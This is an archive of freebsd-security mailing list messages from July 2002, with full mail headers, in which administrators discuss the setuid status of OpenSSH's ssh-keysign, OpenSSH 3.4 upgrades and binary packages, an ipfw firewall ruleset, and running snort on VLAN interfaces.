body of the message From owner-freebsd-security Mon Jul 1 6:57:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5C79C37B400 for ; Mon, 1 Jul 2002 06:57:21 -0700 (PDT) Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by mx1.FreeBSD.org (Postfix) with SMTP id 6C54F43E09 for ; Mon, 1 Jul 2002 06:57:20 -0700 (PDT) (envelope-from cjohnson@palomine.net) Received: (qmail 65808 invoked by uid 1000); 1 Jul 2002 13:57:19 -0000 Date: Mon, 1 Jul 2002 09:57:19 -0400 From: Chris Johnson To: Dag-Erling Smorgrav Cc: security@freebsd.org Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. Message-ID: <20020701135719.GA65770@palomine.net> References: <200206301817.EAA05639@caligula.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jul 01, 2002 at 03:23:59PM +0200, Dag-Erling Smorgrav wrote: > Darren Reed writes: > > With OpenSSH 3.4, ssh-keysign gets installed setuid-root. > > Not in FreeBSD. Are you sure? ===> Registering installation for openssh-portable-3.4p1_2 ===> SECURITY NOTE: This port has installed the following binaries which execute with increased privileges. 95440 296 -rws--x--x 1 root wheel 150996 Jul 1 09:54 /usr/local/libexec/ssh-keysign Chris Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 6:57:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3E1D137B400 for ; Mon, 1 Jul 2002 06:57:34 -0700 (PDT) Received: from mail1.home.nl (mail1.home.nl [213.51.129.225]) by mx1.FreeBSD.org (Postfix) with ESMTP id E8C0343E13 for ; Mon, 1 Jul 2002 06:57:32 -0700 (PDT) (envelope-from nascar24@home.nl) Received: from winxp ([217.120.146.224]) by mail1.home.nl (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20020701135729.TRRI342.mail1.home.nl@winxp> for ; Mon, 1 Jul 2002 15:57:29 +0200 Message-ID: <01a001c22107$3d3b2850$0200a8c0@winxp> From: "nascar24" To: Subject: Making a firewall more closed Date: Mon, 1 Jul 2002 15:57:23 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello all, I've been using the IPFW for some time now but I have one problem. I have closed my firewall (I guess) from attacks from the outside world. But I am open to attacks from within, i.e: trojan horses etc. Here is my rc.firewall.rules file. I think it is in rule 500 & 550. But if I change them to 21,22,80,8080 I cannot connect to any websites or FTP sites. # allow loopback traffic add 100 allow ip from any to any via lo0 # protect loopback address add 200 deny log ip from 127.0.0.1 to any add 249 deny log ip from any to 127.0.0.1 # block spoofs add 400 deny log ip from me to any in via ed0 # enable NATD add 425 divert 8668 ip from any to any via ed0 # check dynamic rules add 450 check-state # make dynamic entries for all outgoing traffic add 500 allow log tcp from me to any 1-65535 keep-state out add 550 allow log udp from me to any 1-65535 keep-state out # services we offer to the world add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state in # pass ICMP add 700 allow log icmp from me to any out add 750 allow log icmp from any to me in # pass everything on private LAN add 800 allow log all from 192.168.0.0/16 to any add 850 allow log all from any to 192.168.0.0/16 # log rejects that have fallen through add 65000 deny log ip from any to any I hope you can help, thanks in advance. Marcel. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7: 1:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0761237B400 for ; Mon, 1 Jul 2002 07:01:37 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8A41443E0A for ; Mon, 1 Jul 2002 07:01:36 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 483E2534A; Mon, 1 Jul 2002 16:01:35 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Chris Johnson Cc: security@freebsd.org Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. References: <200206301817.EAA05639@caligula.anu.edu.au> <20020701135719.GA65770@palomine.net> From: Dag-Erling Smorgrav Date: 01 Jul 2002 16:01:34 +0200 In-Reply-To: <20020701135719.GA65770@palomine.net> Message-ID: Lines: 27 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Chris Johnson writes: > On Mon, Jul 01, 2002 at 03:23:59PM +0200, Dag-Erling Smorgrav wrote: > > Darren Reed writes: > > > With OpenSSH 3.4, ssh-keysign gets installed setuid-root. > > Not in FreeBSD. > Are you sure? I don't care about the port. Personally, I'd rather it didn't exist, and I think admins who install it need to have their head checked. des@des ~% cat /usr/src/secure/usr.bin/ssh-keysign/Makefile # $FreeBSD: src/secure/usr.bin/ssh-keysign/Makefile,v 1.4 2002/06/25 19:10:09 des Exp $ PROG= ssh-keysign MAN= ssh-keysign.8 CFLAGS+=-I${SSHDIR} DPADD= ${LIBSSH} ${LIBCRYPTO} ${LIBZ} LDADD= -lssh -lcrypto -lz .include .PATH: ${SSHDIR} DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7: 2:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D191F37B405 for ; Mon, 1 Jul 2002 07:02:40 -0700 (PDT) Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id F057343E1D for ; Mon, 1 Jul 2002 07:02:38 -0700 (PDT) (envelope-from anderson@centtech.com) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g61E2a105772; Mon, 1 Jul 2002 09:02:36 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g61E2ap21056; Mon, 1 Jul 2002 09:02:36 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g61E2X521044; Mon, 1 Jul 2002 09:02:33 -0500 (CDT) Message-ID: <3D2060F9.9FA544B7@centtech.com> Date: Mon, 01 Jul 2002 09:02:33 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Dag-Erling Smorgrav Cc: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav wrote: > > *ahem* there are some who would say that "statistic" has been a > blatant lie for almost as long as it's been on the web page. > Heheheh. I won't argue with you there. However, still better than MS's: No default install without a remote root in over 20 years. Eric -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7: 7:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B991A37B400 for ; Mon, 1 Jul 2002 07:07:47 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 45F6B43E09 for ; Mon, 1 Jul 2002 07:07:47 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 7DE9F5349; Mon, 1 Jul 2002 16:07:45 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Eric Anderson Cc: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> <3D2060F9.9FA544B7@centtech.com> From: Dag-Erling Smorgrav Date: 01 Jul 2002 16:07:44 +0200 In-Reply-To: <3D2060F9.9FA544B7@centtech.com> Message-ID: Lines: 14 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Eric Anderson writes: > Heheheh. I won't argue with you there. However, still better than MS's: > > No default install without a remote root in over 20 years. I think you're wrong here. They didn't have a networking stack before Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten years. (yes, I know about Trumpet Winsock, but it was third-party) DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:12:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B9AFA37B400 for ; Mon, 1 Jul 2002 07:12:11 -0700 (PDT) Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1C7BC43E09 for ; Mon, 1 Jul 2002 07:12:11 -0700 (PDT) (envelope-from anderson@centtech.com) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g61EC8105953; Mon, 1 Jul 2002 09:12:08 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g61EC7L21671; Mon, 1 Jul 2002 09:12:07 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g61EC5521664; Mon, 1 Jul 2002 09:12:05 -0500 (CDT) Message-ID: <3D206335.6A477A1F@centtech.com> Date: Mon, 01 Jul 2002 09:12:05 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Dag-Erling Smorgrav Cc: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> <3D2060F9.9FA544B7@centtech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav wrote: > > Eric Anderson writes: > > Heheheh. I won't argue with you there. However, still better than MS's: > > > > No default install without a remote root in over 20 years. > > I think you're wrong here. They didn't have a networking stack before > Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten > years. > > (yes, I know about Trumpet Winsock, but it was third-party) Oh yea.. That's right - my bad. It's been a long time since I've heard Trumpet Winsock.. Eric -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:30:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 14B9B37B405 for ; Mon, 1 Jul 2002 07:30:41 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4A53343E1A for ; Mon, 1 Jul 2002 07:30:40 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id D467365; Mon, 1 Jul 2002 09:30:39 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g61EUd4N006719; Mon, 1 Jul 2002 09:30:39 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g61EUdeJ006718; Mon, 1 Jul 2002 09:30:39 -0500 (CDT) Date: Mon, 1 Jul 2002 09:30:39 -0500 From: "Jacques A. Vidrine" To: Dag-Erling Smorgrav Cc: "JP Villa (Datafull.com)" , freebsd-security@FreeBSD.ORG Subject: Re: Re[2]: openssh OR openssh-portable Message-ID: <20020701143038.GM4764@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Dag-Erling Smorgrav , "JP Villa (Datafull.com)" , freebsd-security@FreeBSD.ORG References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 11:52:49PM +0200, Dag-Erling Smorgrav wrote: > "JP Villa (Datafull.com)" writes: > > I think the original question was pointing to this too, > > so I rephrase: openssh or openssh-portable? or maybe > > openssh 3.4 properly merged on a production codebase? and > > in that case, when? > > In my opinion, the latter is the best option, but it's your machine > and your call. Jacques Vidrine has the final word in this matter, and > I can't speak for him, but I expect 3.4 will hit -STABLE (and > hopefully the security branches) sometime next week. At this time, OpenSSH 3.4 will not be merged into the security branches. They are currently not vulnerable, and major upgrades are outside the scope of the security branches, particularly when such upgrades are practically guaranteed to break existing installations. Of course, OpenSSH 3.4 is always available via the Ports Collection, and I would, in fact, recommend that users take advantage of it and turn on PrivilegeSeperation if at all possible. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:37:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2303737B400; Mon, 1 Jul 2002 07:37:26 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id A1CA643E09; Mon, 1 Jul 2002 07:37:25 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 3C6A85349; Mon, 1 Jul 2002 16:37:24 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Jacques A. Vidrine" Cc: "JP Villa (Datafull.com)" , freebsd-security@FreeBSD.ORG Subject: Re: Re[2]: openssh OR openssh-portable References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> <20020701143038.GM4764@madman.nectar.cc> From: Dag-Erling Smorgrav Date: 01 Jul 2002 16:37:23 +0200 In-Reply-To: <20020701143038.GM4764@madman.nectar.cc> Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Jacques A. Vidrine" writes: > Of course, OpenSSH 3.4 is always available via the Ports Collection, > and I would, in fact, recommend that users take advantage of it and > turn on PrivilegeSeperation if at all possible. I wouldn't - the port needs quite a bit of work and is too much of a moving target right now :( DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:40:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CCD6A37B400; Mon, 1 Jul 2002 07:40:44 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0E3A043E09; Mon, 1 Jul 2002 07:40:44 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 63BF034; Mon, 1 Jul 2002 09:40:43 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g61Eeh4N006826; Mon, 1 Jul 2002 09:40:43 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g61EehoI006825; Mon, 1 Jul 2002 09:40:43 -0500 (CDT) Date: Mon, 1 Jul 2002 09:40:43 -0500 From: "Jacques A. Vidrine" To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG, dinoex@FreeBSD.ORG Subject: Re: Re[2]: openssh OR openssh-portable Message-ID: <20020701144043.GQ4764@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG, dinoex@FreeBSD.org References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> <20020701143038.GM4764@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jul 01, 2002 at 04:37:23PM +0200, Dag-Erling Smorgrav wrote: > "Jacques A. Vidrine" writes: > > Of course, OpenSSH 3.4 is always available via the Ports Collection, > > and I would, in fact, recommend that users take advantage of it and > > turn on PrivilegeSeperation if at all possible. > > I wouldn't - the port needs quite a bit of work and is too much of a > moving target right now :( I'll have us agree by defining `if at all possible' to include a stable, working OpenSSH port :-) I'm sure Dirk is ready and willing to fix any problems that crop up. I think that the port currently provides the functionality needed by a large cross-section of users. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:44: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2888A37B400 for ; Mon, 1 Jul 2002 07:44:00 -0700 (PDT) Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3B44D43E2F for ; Mon, 1 Jul 2002 07:43:59 -0700 (PDT) (envelope-from d.m.pick@qmul.ac.uk) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.32 #1) id 17P2PE-0004ZB-00 for security@freebsd.org; Mon, 01 Jul 2002 15:43:56 +0100 Received: from localhost ([127.0.0.1] helo=xi.css.qmw.ac.uk) by xi.css.qmw.ac.uk with esmtp (Exim 3.34 #1) id 17P2Ol-0002Jf-00 for security@freebsd.org; Mon, 01 Jul 2002 15:43:27 +0100 X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: security@freebsd.org Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. In-reply-to: Your message of "01 Jul 2002 16:01:34 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 01 Jul 2002 15:43:27 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 01 Jul 2002 16:01:34 +0200, Dag-Erling Smorgrav wrote: > Chris Johnson writes: > > On Mon, Jul 01, 2002 at 03:23:59PM +0200, Dag-Erling Smorgrav wrote: > > > Darren Reed writes: > > > > With OpenSSH 3.4, ssh-keysign gets installed setuid-root. > > > Not in FreeBSD. > > Are you sure? > > I don't care about the port. Personally, I'd rather it didn't exist, > and I think admins who install it need to have their head checked. At least the port can be built and installed without having to have large amounts of system source installed on the limited amount of hard disc available on a laptop with multiple OSs installed. Of course, a binary system update can be installed even more easily without *any* source but we don't have any such available. At least we can build a binary update "package" for the "ports" version using a simple "make package"; it's harder for the version integrated into the base. The previous SA (SA-02:13) on OpenSSH 2.9 as included in the base included instructions for building a corrected version with the minimum amount of compilation and minimum amount of source installed but didn't include any help on just how much source *was* the minimum amount. And you had to extract parts of (IIRC) three of the "source" distributions. This is even more true for the recent resolver problems... Please note that I have *not* asked for a binary update. I don't want to get flamed the way Brett does... -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 9:17:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9807537B400 for ; Mon, 1 Jul 2002 09:17:31 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id BE70243E09 for ; Mon, 1 Jul 2002 09:17:30 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA05006; Mon, 1 Jul 2002 10:17:17 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701101637.022a78a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 10:17:09 -0600 To: Eric Anderson , Dag-Erling Smorgrav From: Brett Glass Subject: Re: SSH Patches Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <3D205C4A.3E1D2935@centtech.com> References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:42 AM 7/1/2002, Eric Anderson wrote: >Although, it is almost sad to see: > >"One remote hole in the default install, in nearly 6 years!" > >On the OpenBSD page now. Oh well. It's still the best track record in the world. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 9:31:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 73CF437B401 for ; Mon, 1 Jul 2002 09:31:06 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 786B343E0A for ; Mon, 1 Jul 2002 09:31:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA05234; Mon, 1 Jul 2002 10:30:52 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701102105.022a44f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 10:30:44 -0600 To: David Pick , security@FreeBSD.ORG From: Brett Glass Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:43 AM 7/1/2002, David Pick wrote: >At least we can build a binary update "package" >for the "ports" version using a simple "make package"; it's >harder for the version integrated into the base. You can make a binary updater using the currently available port. Just do cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE package Beware, though, that you'll also want to install the latest OpenSSL "engine". I believe that you can make this into a binary package as well. >Please note that I have *not* asked for a binary update. >I don't want to get flamed the way Brett does... ...for asking something reasonable? ;-) Seriously: Please do ask. If we do not have up-to-date binary packages, a large percentage of the new installs of FreeBSD (both network installs and those from CD-ROM) will be vulnerable from the start, even though the holes have long been identified. This is not only unethical but also terrible for FreeBSD's reputation. Already, the Apache/FreeBSD worm is making the rounds. Why allow new installs to be vulnerable? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 9:54:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B906237B400 for ; Mon, 1 Jul 2002 09:54:27 -0700 (PDT) Received: from balrog.rt.ru (balrog.rt.ru [217.107.221.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id DD48143E09 for ; Mon, 1 Jul 2002 09:54:24 -0700 (PDT) (envelope-from dima@rt.ru) Received: from rt.ru (localhost [127.0.0.1]) by balrog.rt.ru (8.9.3/8.9.3) with ESMTP id UAA29462 for ; Mon, 1 Jul 2002 20:51:52 +0400 (MSD) (envelope-from dima@rt.ru) Message-ID: <3D2088A8.CCE2540F@rt.ru> Date: Mon, 01 Jul 2002 20:51:52 +0400 From: "Dmitry S. Rzhavin" Organization: Rostelecom X-Mailer: Mozilla 4.7 [en] (X11; I; FreeBSD 4.0-20000103-CURRENT i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: snort + vlans Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello! I have number of vlans on my box, all af them configured on xl0. So, xl0 does not have any ip address, but it is turned up. Now I want to start snort on this box. 'snort -i what' shall I tell to make snort listen and analyze my traffic? And, if I asked about vlans... What about vtp in Free? Does Free knows vtp, how to configure it, and what vtp mode does FreeBSD operate? Thank you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 10: 5:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E6FFB37B400 for ; Mon, 1 Jul 2002 10:05:46 -0700 (PDT) Received: from web10106.mail.yahoo.com (web10106.mail.yahoo.com [216.136.130.56]) by mx1.FreeBSD.org (Postfix) with SMTP id 9FE2A43E26 for ; Mon, 1 Jul 2002 10:05:46 -0700 (PDT) 